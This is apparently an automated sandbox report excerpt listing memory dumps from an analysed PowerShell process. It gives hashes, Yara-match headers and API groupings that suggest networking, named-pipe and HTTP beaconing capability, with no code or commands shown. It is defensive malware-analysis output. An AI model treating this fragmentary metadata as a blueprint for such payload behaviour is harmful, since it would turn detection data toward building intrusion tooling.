                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $<$ailure #%d - %s$e '
                                                    • API String ID: 0-963976815
                                                    • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                    • Instruction ID: 2f70d7a9d35031bc7479e1bce26d728f803154bb4e797c50f4ba147576fd9b1b
                                                    • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                    • Instruction Fuzzy Hash: AD92E1B2325A8087DB58CB5DE4A573AB7A1F3C8B84F44512AEB9B87794CE3CC451DB04
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                                                    • String ID:
                                                    • API String ID: 3419463915-0
                                                    • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                                    • Instruction ID: 8612554504fa7a9aac0bad0d8e782d54ae22791234dedcfe7bafdb7c0a24e029
                                                    • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                                    • Instruction Fuzzy Hash: 07E1A562610741A3FF28CBA5FA553AAA3A1F75C384F054125DB8ADBFA2DB3CE045D340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                                                    • Instruction ID: 6462c2156cb3ec47cf88a60691205ef4dde0d67143a9b1e90d6d8ff13097a014
                                                    • Opcode Fuzzy Hash: 133629f3ff4376339bdb4199f1e62c11324afdffa1ae21ac4a70826d2a5797c2
                                                    • Instruction Fuzzy Hash: E4015E73624A418FEB208F60E4893AE33B0F35876EF010909F64946EA9DB7CC159CF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $<
                                                    • API String ID: 0-428540627
                                                    • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                    • Instruction ID: b9862f2c2469f3e43299910f0a7de1910dbc3bca859739c3264ec9ff45a42dda
                                                    • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                    • Instruction Fuzzy Hash: 3392E3B2325A4087DB58CB1DE4A573AB7A1F3C8B84F44512AE79B87BA4CE3CC551DB04
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ailure #%d - %s$e '
                                                    • API String ID: 0-4163927988
                                                    • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                    • Instruction ID: 1dd36eb37b7f47dbc6d69a01c69b4af96d6b6a95ac5c643404d7453249084db7
                                                    • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                    • Instruction Fuzzy Hash: 9C612CB62146509BDB24CF1DE4E466AB7E1F3CCB84F84421AE38A87B68CB3CD545DB44
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateNamedPipe
                                                    • String ID:
                                                    • API String ID: 2489174969-0
                                                    • Opcode ID: ffc033c595a008210ccbf7715394fddec234f51f7fbc04560c83c088a3818f65
                                                    • Instruction ID: 8cdfc71f35d81c91a30e9e59c1217f096b0642703d644405c01957daf3c9174c
                                                    • Opcode Fuzzy Hash: ffc033c595a008210ccbf7715394fddec234f51f7fbc04560c83c088a3818f65
                                                    • Instruction Fuzzy Hash: 9C018C32610B42AAEF11CB90F94835A77A1F79C775F564314D6990AFE6EB3CC118EB04
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                    • Instruction ID: b0909672a71837b2583cf8b00c83119afc506bea2e6f70458d2a7eea0321f952
                                                    • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                    • Instruction Fuzzy Hash: 82525EB22149418BDB18CF1DE4B173AB7A1F3C9B80F44852AE7878BB99CE2CD554DB04
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                    • Instruction ID: 7289319a98fc0fd69f5499c9526df5240476a26e0cc2faf47c1825d84e343ddf
                                                    • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                    • Instruction Fuzzy Hash: A55266B221494197DB08CB1CE4A573AB7E1F3C9B80F44852AE7978BBA9CE3DD550DB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                    • Instruction ID: 2789b90ca248a35f56bd16abef7c8d999e29aa727c3d0a305d9ceb89aece5320
                                                    • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                    • Instruction Fuzzy Hash: 705275B221458187DB18CF1DE4A473AB7E1F3C9B80F44852AE7868BB98CA3DD544DF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                    • Instruction ID: 111675f752c247ad95ab9a885b7610dea7761bfa44ec7a4872a80f1396e64eb8
                                                    • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                    • Instruction Fuzzy Hash: B15268B221498197DB08CF1DE4A573AB7E1F3CD780F44852AE7868BBA9CA3CD545DB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                                                    • Instruction ID: 410bb539b7fc4aef7a495cc9f4b0e386de28e1d9917ace5069d7236e48d79851
                                                    • Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                                                    • Instruction Fuzzy Hash: 95F19822704683A2EF30CB95F6A839E73A1F7A4798F520115DBC987F85EB34C985DB44
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: 39230a270b39aa7a03f1acc75e1d4406c9dcc848d7b32e178703d764618bc014
                                                    • Instruction ID: d9aaaffca6bb1529661b946d2865b2b55e5786523a60238228c849d4abb7c07a
                                                    • Opcode Fuzzy Hash: 39230a270b39aa7a03f1acc75e1d4406c9dcc848d7b32e178703d764618bc014
                                                    • Instruction Fuzzy Hash: B0F1BA6231464267EF20CB95F7A839E63A1F79C7C4F920121EA49CBFA5EA3CC905D740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                                                    • Instruction ID: 9b7fb0ce0df590d690e4e9a84df3ce06483fedb78fba2462d04161a28a2f1702
                                                    • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                                                    • Instruction Fuzzy Hash: 00E1D16271070093FF74CBA5EA693AA63A1F7A4754F068125DBCE87E86DB3CE085D344
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                                                    • Instruction ID: a9b308227936368885a5768574c2fa8c2da0a59b91ddd908b1fac46bf7483142
                                                    • Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                                                    • Instruction Fuzzy Hash: 8FE1D632704A83A1EF309B95E5A43EE67A1F7A478CF920011DB8D87E99EB34C985D744
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: fb1a47b38430a28a9ce52fe961906e0d16b6bf2ab463da1186ab792c5180ee2f
                                                    • Instruction ID: 8331bcb1457d6410556cd74856e49cb29e26d58d317f5adbae47363ee1dca71b
                                                    • Opcode Fuzzy Hash: fb1a47b38430a28a9ce52fe961906e0d16b6bf2ab463da1186ab792c5180ee2f
                                                    • Instruction Fuzzy Hash: 05E1C762314A4262EF209B95F76439E67A1F79C7C8F820021DA49DBFB5EB3CC945D740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                                                    • Instruction ID: 73fd1cfd9b2da8678623a770c9c92a51e0463d551cfc85ba5d5723aa0bee59bf
                                                    • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                                                    • Instruction Fuzzy Hash: 7271C132614A40E6EF318FA5E66835E73E0F7A8B84F025129DAC947F94DF38C454AF48
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                    • Instruction ID: 57127f9501db14766b3551d79096ff62ed535da517596f2af0b40090deb5e2d9
                                                    • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                    • Instruction Fuzzy Hash: 38613EB6214A509BDB54CB0DE4D462AB7E1F3CC784F84421AE38B8BB78CA3CD545DB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2449b57596a50ad70bf5a79ad03ba1278d28424a0d500497218b9da266a4c145
                                                    • Instruction ID: b445f5c232932eb450832e13d8518f1b5806b1264e696cb039e1d4e9af345165
                                                    • Opcode Fuzzy Hash: 2449b57596a50ad70bf5a79ad03ba1278d28424a0d500497218b9da266a4c145
                                                    • Instruction Fuzzy Hash: ADF01297E1DAD266FE6356949DAD3582F91A7AEA11F4F818A8B4047FE3B40D0801F212
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29815153074e48871c3a2db5cbc692924d6533ff20b66ed198598eb5028f0353
                                                    • Instruction ID: f0770e9e924f59feec01357c703aa86827f69510df92ff26a9f885cb6f7b8b8b
                                                    • Opcode Fuzzy Hash: 29815153074e48871c3a2db5cbc692924d6533ff20b66ed198598eb5028f0353
                                                    • Instruction Fuzzy Hash: 08E01CD7E0EEC15AFB6245A45EB921E2FD1A7AE900F4F408A87404BBE3A54E0C047311
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6a38d87a5f747cfd96f0f8b0dd282aa28bb16f1709dd6933a6d9f996ca703024
                                                    • Instruction ID: 57de98d6538fa8298c5ad49413b0c6c2f6e1d7b828e6ef344fc994d731bffcf2
                                                    • Opcode Fuzzy Hash: 6a38d87a5f747cfd96f0f8b0dd282aa28bb16f1709dd6933a6d9f996ca703024
                                                    • Instruction Fuzzy Hash: 59E04897D1D6D25AEE5756645DAE3882F90A3AF925F8B418BC64047FD3B10D0C05F311
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                                    • Instruction ID: cdd49959d2808f7d377b8a8589fd15b5391220e7d694c6db10a901c9cf0d696d
                                                    • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                                                    • Instruction Fuzzy Hash: 81D012C7A1D6D215FEA392A49E6D3481F9063BA521F4E41CF86800EBF3A44D1801B211
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: acceptioctlsocket$closesockethtonlselect
                                                    • String ID:
                                                    • API String ID: 2003300010-0
                                                    • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                                    • Instruction ID: 5ee0c2036f9400118f43ed8c7f4d6a3c5c8cea76e313fcbbe0cd53ee9065c98c
                                                    • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                                                    • Instruction Fuzzy Hash: FD918C32610A91AAEF31CFA1EA9879D33A1F78C794F011126EA4D4BFA5DF38C565D700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                                                    • String ID: %s%s$*/*
                                                    • API String ID: 3787158362-856325523
                                                    • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                                    • Instruction ID: 58e8359b469f14fb117c896152673baded2efca7ab9dc8fd7969fd12abd9dae3
                                                    • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                                                    • Instruction Fuzzy Hash: 3F817C66200B45A5EF109BA1FA987D973A0F39C788F420122DA4D5BFB9DF7CC509E750
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
